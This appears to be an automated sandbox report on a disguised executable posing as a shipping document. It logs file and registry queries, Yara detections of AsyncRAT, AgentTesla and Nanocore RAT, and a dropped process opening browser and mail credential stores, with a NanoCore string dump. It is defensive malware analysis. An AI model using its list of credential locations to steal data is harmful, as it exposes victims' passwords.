Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Isgeprf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\VLC2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\VLC2.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe

Code function: 5_2_05A62654 GetUserNameW,

5_2_05A62654

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Isgeprf.exe PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
Source: Yara match	File source: Process Memory Space: VLC2.exe PID: 6228, type: MEMORY
Source: Yara match	File source: Process Memory Space: VLC2.exe PID: 6008, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\VLC2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, type: DROPPED
Source: Yara match	File source: 14.0.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.245444705.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fdquqwatjjr.exe PID: 7032, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, type: DROPPED
Source: Yara match	File source: 5.0.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
Source: Yara match	File source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Fdquqwatjjr.exe PID: 7032, type: MEMORY

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: Icda.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: Icda.exe, 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientM